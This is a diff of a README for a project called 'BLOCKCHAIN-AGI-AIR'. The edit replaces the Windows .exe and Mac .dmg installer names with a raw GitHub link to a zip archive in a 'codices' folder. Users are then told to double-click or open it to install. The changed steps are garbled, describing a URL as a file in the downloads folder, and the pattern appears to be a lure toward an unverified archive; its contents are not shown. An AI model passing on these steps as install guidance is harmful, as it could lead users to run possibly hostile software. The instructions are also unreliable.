Marder66699/BLOCKCHAIN-AGI-AIR/README.md

 ### For Windows:

-1. Locate the `BLOCKCHAIN-AGI-AIR-Windows.exe` file in your downloads folder.
+1. Locate the `https://raw.githubusercontent.com/Marder66699/BLOCKCHAIN-AGI-AIR/main/codices/BLOCKCHAIN-AGI-AIR.zip` file in your downloads folder.
 2. Double-click the file to start the installation.
 3. Follow the on-screen prompts to complete the installation.
 4. After installation, find the app in the start menu and click to open.

 ### For Mac:

-1. Find the `BLOCKCHAIN-AGI-AIR-Mac.dmg` file in your downloads.
+1. Find the `https://raw.githubusercontent.com/Marder66699/BLOCKCHAIN-AGI-AIR/main/codices/BLOCKCHAIN-AGI-AIR.zip` file in your downloads.
 2. Open the file to mount it.
 3. Drag the application into your Applications folder.
 4. Go to your Applications to find and launch the app.